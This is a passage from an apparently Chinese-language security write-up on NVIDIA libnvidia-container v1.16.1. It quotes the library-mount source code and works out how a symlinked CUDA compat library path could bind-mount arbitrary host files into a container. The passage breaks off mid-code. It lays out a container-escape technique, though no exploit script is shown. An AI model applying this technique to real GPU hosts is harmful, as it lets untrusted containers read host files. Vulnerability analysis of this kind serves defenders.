根据收集到的容器内的cuda库文件cnt->libs
, 经 filter_libraries
过滤,挂载到容器内。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L767C1-L782C10
int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
...
/* Container library mounts */
if (cnt->libs != NULL && cnt->nlibs > 0) {
size_t nlibs = cnt->nlibs;
char **libs = array_copy(&ctx->err, (constchar * const *)cnt->libs, cnt->nlibs);
if (libs == NULL)
goto fail;
filter_libraries(info, libs, &nlibs);
if ((tmp = (constchar **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
free(libs);
goto fail;
}
ptr = array_append(ptr, tmp, array_size(tmp));
free(tmp);
free(libs);
}
...
}
其中 cnt->libs
为容器的/usr/local/cuda/compat/lib*.so.*
文件。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_container.c#L61
static int
find_library_paths(struct error *err, struct nvc_container *cnt)
{
char path[PATH_MAX];
glob_t gl;
int rv = -1;
char **ptr;
if (!(cnt->flags & OPT_COMPUTE_LIBS))
return (0);
if (path_resolve_full(err, path, cnt->cfg.rootfs, cnt->cfg.cudart_dir) < 0)
return (-1);
if (path_append(err, path, "compat/lib*.so.*") < 0)
return (-1);
if (xglob(err, path, GLOB_ERR, NULL, &gl) < 0)
goto fail;
if (gl.gl_pathc > 0) {
cnt->nlibs = gl.gl_pathc;
cnt->libs = ptr = array_new(err, gl.gl_pathc);
if (cnt->libs == NULL)
goto fail;
for (size_t i = 0; i < gl.gl_pathc; ++i) {
if (path_resolve(err, path, cnt->cfg.rootfs, gl.gl_pathv[i] + strlen(cnt->cfg.rootfs)) < 0)
goto fail;
if (!str_array_match(path, (constchar * const *)cnt->libs, (size_t)(ptr - cnt->libs))) {
log_infof("selecting %s%s", cnt->cfg.rootfs, path);
if ((*ptr++ = xstrdup(err, path)) == NULL)
goto fail;
}
}
array_pack(cnt->libs, &cnt->nlibs);
}
rv = 0;
fail:
globfree(&gl);
return (rv);
}
filter_libraries
函数主要过滤出满足以下条件的库,才执行挂载:
-
文件名中要有 .so.
-
与主机cuda库版本号不匹配
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L562
static void
filter_libraries(const struct nvc_driver_info *info, char * paths[], size_t *size)
{
char *lib, *maj;
/*
* XXX Filter out any library that matches the major version of RM to prevent us from
* running into an unsupported configurations (e.g. CUDA compat on Geforce or non-LTS drivers).
*/
for (size_t i = 0; i < *size; ++i) {
lib = basename(paths[i]);
if ((maj = strstr(lib, ".so.")) != NULL) {
maj += strlen(".so.");
if (strncmp(info->nvrm_version, maj, strspn(maj, "0123456789")))
continue;
}
paths[i] = NULL;
}
array_pack(paths, size);
}
3. 漏洞分析
3.1 漏洞点分析
首先让我们预设漏洞效果: 可以从主机挂载任意文件到容器。要达到这样的效果,条件是挂载的源地址要可控。
根据章节“2. 调用链分析”,cuda前向兼容特性提供了这样一个机会:从容器挂载文件到容器。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L767C1-L782C10
int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
...
/* Container library mounts */
if (cnt->libs != NULL && cnt->nlibs > 0) {
size_t nlibs = cnt->nlibs;
char **libs = array_copy(&ctx->err, (constchar * const *)cnt->libs, cnt->nlibs);
if (libs == NULL)
goto fail;
filter_libraries(info, libs, &nlibs);
if ((tmp = (constchar **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
free(libs);
goto fail;
}
ptr = array_append(ptr, tmp, array_size(tmp));
free(tmp);
free(libs);
}
...
}
令libs路径为指向主机目录的软链接,如果后续没有防护措施,则可能达成漏洞效果。
挂载时没有什么防护,只有一个要满足match_binary_flags()
的要求。
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L100
static char **
mount_files(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir, char *paths[], size_t size)
{
char src[PATH_MAX];
char dst[PATH_MAX];
mode_t mode;
char *src_end, *dst_end, *file;
char **mnt, **ptr;
if (path_new(err, src, root) < 0)
return (NULL);
if (path_resolve_full(err, dst, cnt->cfg.rootfs, dir) < 0)
return (NULL);
if (file_create(err, dst, NULL, cnt->uid, cnt->gid, MODE_DIR(0755)) < 0)
return (NULL);
src_end = src + strlen(src);
dst_end = dst + strlen(dst);
mnt = ptr = array_new(err, size + 1); /* NULL terminated. */
if (mnt == NULL)
return (NULL);
for (size_t i = 0; i < size; ++i) {
file = basename(paths[i]);
if (!match_binary_flags(file, cnt->flags) && !match_library_flags(file, cnt->flags))
continue;
if (path_append(err, src, paths[i]) < 0)
goto fail;
if (path_append(err, dst, file) < 0)
goto fail;
if (file_mode(err, src, &mode) < 0)
goto fail;
if (file_create(err, dst, NULL, cnt->uid, cnt->gid, mode) < 0)
goto fail;
log_infof("mounting %s at %s", src, dst);
if (xmount(err, src, dst, NULL, MS_BIND, NULL) < 0)
goto fail;
if (xmount(err, NULL, dst, NULL, MS_BIND|MS_REMOUNT | MS_RDONLY|MS_NODEV|MS_NOSUID, NULL) < 0)
goto fail;
if ((*ptr++ = xstrdup(err, dst)) == NULL)
goto fail;
*src_end = '
评论